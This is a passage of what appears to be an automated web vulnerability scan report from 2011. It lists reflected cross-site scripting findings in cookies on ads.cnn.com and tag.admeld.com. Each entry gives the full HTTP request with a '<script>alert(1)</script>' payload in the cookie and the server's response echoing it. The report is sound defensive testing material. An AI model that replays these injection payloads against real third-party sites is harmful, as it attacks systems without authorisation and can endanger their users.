<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...
87,47399,47805&Targets=1515,12486,10559&Values=46,60,83,100,150,690,1589,3449,4444,49568,49570,52263,52901,56058,57005,58702,61089,61887,61913,64143,64144&RawValues=NGUSERID%2Caa55a24-13483-843388069-168dd5"><script>alert(1)</script>08a92e42cf7%2CTIL%2C1300909177539&Redirect=http://ad.doubleclick.net/clk;234138931;58011317;z">
...[SNIP]...

1.272. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=315x40_spon2&cnn_money_rollup=homepage&cnn_money_section=sponsor_center¶ms.styles=fs&tile=1300909177539&page.allowcompete=yes&domId=25457 [NGUserID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_position=315x40_spon2&cnn_money_rollup=homepage&cnn_money_section=sponsor_center&params.styles=fs&tile=1300909177539&page.allowcompete=yes&domId=25457

Issue detail

The value of the NGUserID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10315"><script>alert(1)</script>cc00e6787aa was submitted in the NGUserID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /html.ng/site=cnn_money&cnn_money_position=315x40_spon2&cnn_money_rollup=homepage&cnn_money_section=sponsor_center&params.styles=fs&tile=1300909177539&page.allowcompete=yes&domId=25457 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WSOD%5FmyStocksTab=last5; NGUserID=aa55a24-13483-843388069-110315"><script>alert(1)</script>cc00e6787aa

Response

HTTP/1.1 200 OK
Date: Wed, 23 Mar 2011 19:39:43 GMT
Server: Apache
AdServer: ad3ad2:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Wed, 23 Mar 2011 19:39:43 GMT
Pragma: no-cache
Content-Length: 2914
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...
05&amp;Targets=1515,10508,71657&amp;Values=46,60,83,100,150,690,1589,3449,4444,49568,49576,52263,52901,56058,57005,58702,61089,61887,61913,64143,64144&amp;RawValues=NGUSERID%2Caa55a24-13483-843388069-110315"><script>alert(1)</script>cc00e6787aa%2CTIL%2C1300909177539&amp;random=bkqqkAl,bgyutdWclbats&amp;Params.tag.transactionid=" width="1" height="1"border="0" />
...[SNIP]...

1.273. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=315x40_spon3&cnn_money_rollup=homepage&cnn_money_section=sponsor_center¶ms.styles=fs&tile=1300909177539&page.allowcompete=yes&domId=471129 [NGUserID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_position=315x40_spon3&cnn_money_rollup=homepage&cnn_money_section=sponsor_center&params.styles=fs&tile=1300909177539&page.allowcompete=yes&domId=471129

Issue detail

The value of the NGUserID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b797a"><script>alert(1)</script>ad28ba33eba was submitted in the NGUserID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /html.ng/site=cnn_money&cnn_money_position=315x40_spon3&cnn_money_rollup=homepage&cnn_money_section=sponsor_center&params.styles=fs&tile=1300909177539&page.allowcompete=yes&domId=471129 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WSOD%5FmyStocksTab=last5; NGUserID=aa55a24-13483-843388069-1b797a"><script>alert(1)</script>ad28ba33eba

Response

HTTP/1.1 200 OK
Date: Wed, 23 Mar 2011 19:39:54 GMT
Server: Apache
AdServer: ad3ad2:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Wed, 23 Mar 2011 19:39:54 GMT
Pragma: no-cache
Content-Length: 3171
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...
53,47387,47399,47805&Targets=1515,10521&Values=46,60,83,100,150,690,1589,3449,4444,49568,49577,52263,52901,56058,57005,58702,61089,61887,61913,64143,64144&RawValues=NGUSERID%2Caa55a24-13483-843388069-1b797a"><script>alert(1)</script>ad28ba33eba%2CTIL%2C1300909177539&Redirect=http://ad.doubleclick.net/clk;231330797;55016266;f">
...[SNIP]...

1.274. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=315x40_spon4&cnn_money_rollup=homepage&cnn_money_section=sponsor_center¶ms.styles=fs&tile=1300909177539&page.allowcompete=yes&domId=906497 [NGUserID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_position=315x40_spon4&cnn_money_rollup=homepage&cnn_money_section=sponsor_center&params.styles=fs&tile=1300909177539&page.allowcompete=yes&domId=906497

Issue detail

The value of the NGUserID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aec23"><script>alert(1)</script>f232945ba9b was submitted in the NGUserID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /html.ng/site=cnn_money&cnn_money_position=315x40_spon4&cnn_money_rollup=homepage&cnn_money_section=sponsor_center&params.styles=fs&tile=1300909177539&page.allowcompete=yes&domId=906497 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WSOD%5FmyStocksTab=last5; NGUserID=aa55a24-13483-843388069-1aec23"><script>alert(1)</script>f232945ba9b

Response

HTTP/1.1 200 OK
Date: Wed, 23 Mar 2011 19:39:47 GMT
Server: Apache
AdServer: ad3ad2:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Wed, 23 Mar 2011 19:39:47 GMT
Pragma: no-cache
Content-Length: 3361
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...
53,47387,47399,47805&Targets=1515,10612&Values=46,60,83,100,150,690,1589,3449,4444,49568,49578,52263,52901,56058,57005,58702,61089,61887,61913,64143,64144&RawValues=NGUSERID%2Caa55a24-13483-843388069-1aec23"><script>alert(1)</script>f232945ba9b%2CTIL%2C1300909177539&Redirect=http://clk.redcated/287/go/305526287/direct;at.Demo_copy_42_ch_CENG_TrackingPixel/01/">
...[SNIP]...

1.275. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=315x40_spon5&cnn_money_rollup=homepage&cnn_money_section=sponsor_center¶ms.styles=fs&tile=1300909177539&page.allowcompete=yes&domId=217296 [NGUserID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_position=315x40_spon5&cnn_money_rollup=homepage&cnn_money_section=sponsor_center&params.styles=fs&tile=1300909177539&page.allowcompete=yes&domId=217296

Issue detail

The value of the NGUserID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3a00"><script>alert(1)</script>329942995e0 was submitted in the NGUserID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /html.ng/site=cnn_money&cnn_money_position=315x40_spon5&cnn_money_rollup=homepage&cnn_money_section=sponsor_center&params.styles=fs&tile=1300909177539&page.allowcompete=yes&domId=217296 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WSOD%5FmyStocksTab=last5; NGUserID=aa55a24-13483-843388069-1b3a00"><script>alert(1)</script>329942995e0

Response

HTTP/1.1 200 OK
Date: Wed, 23 Mar 2011 19:40:25 GMT
Server: Apache
AdServer: ad3ad2:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Wed, 23 Mar 2011 19:40:25 GMT
Pragma: no-cache
Content-Length: 749
Content-Type: text/html

<a target="_blank" href="/event.ng/Type=click&FlightID=4621&AdID=220606&TargetID=1515&Segments=1637,2244,2743,3083,3285,7044,7120,7538,8598,12257,17251,18961,22176,25344,26510,30220,31691,33852,34172,
...[SNIP]...
90,47353,47387,47399,47805&Targets=1515&Values=46,60,83,100,150,690,1589,3449,4444,49568,49579,52263,52901,56058,57005,58702,61089,61887,61913,64143,64144&RawValues=NGUSERID%2Caa55a24-13483-843388069-1b3a00"><script>alert(1)</script>329942995e0%2CTIL%2C1300909177539&Redirect=http%3A%2F%2Fwww.cnn.com">
...[SNIP]...

1.276. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=315x40_spon6&cnn_money_rollup=homepage&cnn_money_section=sponsor_center¶ms.styles=fs&tile=1300909177539&page.allowcompete=yes&domId=757816 [NGUserID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_position=315x40_spon6&cnn_money_rollup=homepage&cnn_money_section=sponsor_center&params.styles=fs&tile=1300909177539&page.allowcompete=yes&domId=757816

Issue detail

The value of the NGUserID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 931ed"><script>alert(1)</script>8d210e1ab0d was submitted in the NGUserID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /html.ng/site=cnn_money&cnn_money_position=315x40_spon6&cnn_money_rollup=homepage&cnn_money_section=sponsor_center&params.styles=fs&tile=1300909177539&page.allowcompete=yes&domId=757816 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WSOD%5FmyStocksTab=last5; NGUserID=aa55a24-13483-843388069-1931ed"><script>alert(1)</script>8d210e1ab0d

Response

HTTP/1.1 200 OK
Date: Wed, 23 Mar 2011 19:40:35 GMT
Server: Apache
AdServer: ad3ad2:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Wed, 23 Mar 2011 19:40:35 GMT
Pragma: no-cache
Content-Length: 749
Content-Type: text/html

<a target="_blank" href="/event.ng/Type=click&FlightID=4621&AdID=220606&TargetID=1515&Segments=1637,2244,2743,3083,3285,7044,7120,7756,8598,12257,17251,18961,22176,25344,26510,30220,31691,33852,34172,
...[SNIP]...
90,47353,47387,47399,47805&Targets=1515&Values=46,60,83,100,150,690,1589,3449,4444,49568,49580,52263,52901,56058,57005,58702,61089,61887,61913,64143,64144&RawValues=NGUSERID%2Caa55a24-13483-843388069-1931ed"><script>alert(1)</script>8d210e1ab0d%2CTIL%2C1300909177539&Redirect=http%3A%2F%2Fwww.cnn.com">
...[SNIP]...

1.277. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=336x280_rgt&cnn_money_rollup=homepage&cnn_money_section=business_unusual&page.allowcompete=yes¶ms.styles=html_tags%20marginheight= [NGUserID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_position=336x280_rgt&cnn_money_rollup=homepage&cnn_money_section=business_unusual&page.allowcompete=yes&params.styles=html_tags%20marginheight=

Issue detail

The value of the NGUserID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 986e5"><script>alert(1)</script>4d2f7af903b was submitted in the NGUserID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /html.ng/site=cnn_money&cnn_money_position=336x280_rgt&cnn_money_rollup=homepage&cnn_money_section=business_unusual&page.allowcompete=yes&params.styles=html_tags%20marginheight= HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WSOD%5FmyStocksTab=last5; NGUserID=aa55a24-13483-843388069-1986e5"><script>alert(1)</script>4d2f7af903b

Response (redirected)

HTTP/1.1 200 OK
Date: Wed, 23 Mar 2011 19:39:54 GMT
Server: Apache
AdServer: ad3ad2:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Wed, 23 Mar 2011 19:39:54 GMT
Pragma: no-cache
Content-Length: 4683
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<body STYLE="background-color:transparent">
<!--FlightID: 365637-->
<img src="http://amch.questionmarket.com/adsc/d883875/2/88499
...[SNIP]...
47,112282,114134,112499,116491,116936&amp;Values=46,60,83,100,150,690,1589,2201,3449,4444,52263,52901,56058,57005,61089,61887,61913,64143,64144,115691&amp;RawValues=NGUSERID%2Caa55a24-13483-843388069-1986e5"><script>alert(1)</script>4d2f7af903b&amp;random=bobpKmu,bgyutekclbbKn&amp;Params.tag.transactionid=" width="1" height="1"border="0" />
...[SNIP]...

1.278. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=336x280_rgt&cnn_money_rollup=homepage&cnn_money_section=business_unusual&page.allowcompete=yes¶ms.styles=html_tags+marginheight= [NGUserID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_position=336x280_rgt&cnn_money_rollup=homepage&cnn_money_section=business_unusual&page.allowcompete=yes&params.styles=html_tags+marginheight=

Issue detail

The value of the NGUserID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c75a"><script>alert(1)</script>dac86c60db4 was submitted in the NGUserID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /html.ng/site=cnn_money&cnn_money_position=336x280_rgt&cnn_money_rollup=homepage&cnn_money_section=business_unusual&page.allowcompete=yes&params.styles=html_tags+marginheight= HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WSOD%5FmyStocksTab=last5; NGUserID=aa55a24-13483-843388069-12c75a"><script>alert(1)</script>dac86c60db4; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Wed, 23 Mar 2011 19:39:58 GMT
Server: Apache
AdServer: ad3ad2:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Wed, 23 Mar 2011 19:39:58 GMT
Pragma: no-cache
Content-Length: 4683
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<body STYLE="background-color:transparent">
<!--FlightID: 365637-->
<img src="http://amch.questionmarket.com/adsc/d883875/2/88499
...[SNIP]...
47,112282,114134,112499,116491,116936&amp;Values=46,60,83,100,150,690,1589,2201,3449,4444,52263,52901,56058,57005,61089,61887,61913,64143,64144,115691&amp;RawValues=NGUSERID%2Caa55a24-13483-843388069-12c75a"><script>alert(1)</script>dac86c60db4&amp;random=cgngwjW,bgyuteoclbcqe&amp;Params.tag.transactionid=" width="1" height="1"border="0" />
...[SNIP]...

1.279. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=336x280_rgt&cnn_money_rollup=homepage¶ms.styles=fs&bizo_ind=business_services&bizo_func=information_technology&bizo_sen=executive&tile=1300909177541&page.allowcompete=yes&domId=632100 [NGUserID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_position=336x280_rgt&cnn_money_rollup=homepage&params.styles=fs&bizo_ind=business_services&bizo_func=information_technology&bizo_sen=executive&tile=1300909177541&page.allowcompete=yes&domId=632100

Issue detail

The value of the NGUserID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4bb61"><script>alert(1)</script>e777bbf60f2 was submitted in the NGUserID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /html.ng/site=cnn_money&cnn_money_position=336x280_rgt&cnn_money_rollup=homepage&params.styles=fs&bizo_ind=business_services&bizo_func=information_technology&bizo_sen=executive&tile=1300909177541&page.allowcompete=yes&domId=632100 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NGUserID=aa55a27-9156-1243085206-14bb61"><script>alert(1)</script>e777bbf60f2

Response

HTTP/1.1 200 OK
Date: Wed, 23 Mar 2011 19:39:26 GMT
Server: Apache
AdServer: ad3ad5:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Wed, 23 Mar 2011 19:39:26 GMT
Pragma: no-cache
Content-Length: 3870
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...
112499,113060,116936&amp;Values=46,60,83,100,150,690,1589,2201,3449,4444,52263,52901,56058,57005,58702,61089,61399,61421,61427,61887,61913,64143,64144&amp;RawValues=NGUSERID%2Caa55a27-9156-1243085206-14bb61"><script>alert(1)</script>e777bbf60f2%2CTIL%2C1300909177541&amp;random=bAkzvsh,bgyutdoigxnju&amp;Params.tag.transactionid=" width="1" height="1"border="0" />
...[SNIP]...

1.280. http://tag.admeld.com/ad/iframe/221/tmz/300x250/homepage_inpost [meld_sess cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/221/tmz/300x250/homepage_inpost

Issue detail

The value of the meld_sess cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f2f8"><script>alert(1)</script>d9701c1d148 was submitted in the meld_sess cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ad/iframe/221/tmz/300x250/homepage_inpost?t=1300831418910&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.tmz.com%2F&refer= HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=63e2c778-f3e1-4d02-8ee2-261dfa64843d5f2f8"><script>alert(1)</script>d9701c1d148; D41U=3neZURdpqdwqeL6TvOZ4lCJ-xdkcbEl9uqP_nBl1mlktEZOzu-6D2NQ

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
X-AdMeld-Debug: eyB0eXBlOiAgICAgICAgICJtZWxkIiwgIHB1YjogICAgICAgICAgMjIxLCAgc2l0ZTogICAgICAgICAidG16IiwgIGFkOiAgICAgICAgICAgMTYwMzkxMCwgIG5ldHdvcms6ICAgICAgImFkY29tIiwgIHNpemU6ICAgICAgICAgIjMwMHgyNTAiLCAgZnJlcTogICAgICAgICAiMS01IiwgIGRlZmF1bHRzOiAgICAgIjAtMCIsICByZXF1ZXN0OiAgICAgICIzZThkZTBjZi0zY2ZhLTRhNzItOGUwNi0xZDg3NDAyOTRiZGUiLCAgdXNlcjogICAgICAgICAiNjNlMmM3NzgtZjNlMS00ZDAyLThlZTItMjYxZGZhNjQ4NDNkNWYyZjgiPjxzY3JpcHQ+YWxlcnQoMSk8L3NjcmlwdD5kOTcwMWMxZDE0OCIsICBjb3VudHJ5OiAgICAgICJVUyIsICBjaXR5OiAgICAgICAgICJEYWxsYXMiLCAgZG1hOiAgICAgICAgICA2MjMsICByZWdpb246ICAgICAgICJUWCIsICBpcDogICAgICAgICAgICIxNzMuMTkzLjIxNC4yNDMiLCAgZGVwdGg6ICAgICAgICAxLCAgdGFyZ2V0OiAgICAgICAiaG9tZXBhZ2VfaW5wb3N0IiwgIGRpdjogICAgICAgICAgIjNlOGRlMGNmLTNjZmEtNGE3Mi04ZTA2LTFkODc0MDI5NGJkZSIsICB1cmw6ICAgICAgICAgICJodHRwOi8vd3d3LnRtei5jb20vIiwgIGVsYXBzZWQ6ICAgICAgMCwgIGRlY2lzaW9uOiAgICAgImFkIiwgIGltcDogICAgICAgICAgMSwgIG5ldHdvcmtfaWQ6ICAgMSwgIGFjY291bnRfaWQ6ICAgNDgzMTEsICBuZXR3b3JrX25hbWU6ICJBZHZlcnRpc2luZy5jb20gKEZpeGVkKSIsICBwdWJsaXNoZXJfbmFtZTogInRteiIsICBlY3BtOiAgICAgICAgICIwLjY0IiwgIGZlY3BtOiAgICAgICAgIjAuNjQiLCAgZmlsbDogICAgICAgICAiMTAwLjAwIiwgIHBsYWNlbWVudDogICAgImhvbWVwYWdlX2lucG9zdCIsICBydWxlOiAgICAgICAgICJob21lcGFnZV9pbnBvc3QiLCAgY3JlYXRpdmVfaWQ6ICAiIiwgIGJpZGRlcnM6ICAgICAgW3sibmV0d29ya19uYW1lIjoiTWF4UG9pbnQgSW50ZXJhY3RpdmUgKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjoxNDA3MTEsICJidXkiOjE3NiwibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIHJlc3BvbnNlIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifSx7Im5ldHdvcmtfbmFtZSI6Ik1lZGlhTWF0aCAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjIwMjczNCwgImJ1eSI6NTAzLCJscCI6IiIsImFuIjoiIiwic3RhdHVzIjoibm8gcmVzcG9uc2UiLCJmaWQiOjAsICJmY3BtIjoiMC4wMCJ9LHsibmV0d29ya19uYW1lIjoiVHJpZ2dpdCAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjI1ODg5NSwgImJ1eSI6MTI0MywibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIHJlc3BvbnNlIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifSx7Im5ldHdvcmtfbmFtZSI6IlhBLm5ldCAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjI2MjEyNCwgImJ1eSI6MjAzNiwibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIHJlc3BvbnNlIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifSx7Im5ldHdvcmtfbmFtZSI6IkFjdWl0eSBBZHMgKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjoxOTAxMjY1LCAiYnV5Ijo1MjEwLCJscCI6IiIsImFuIjoiIiwic3RhdHVzIjoibm8gcmVzcG9uc2UiLCJmaWQiOjAsICJmY3BtIjoiMC4wMCJ9LHsibmV0d29ya19uYW1lIjoiRXFhZHMgKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjoxNzEzOTg2LCAiYnV5Ijo0MjUxLCJscCI6IiIsImFuIjoiIiwic3RhdHVzIjoibm8gcmVzcG9uc2UiLCJmaWQiOjAsICJmY3BtIjoiMC4wMCJ9XSwgIHRhcmdldGluZzogICAgIi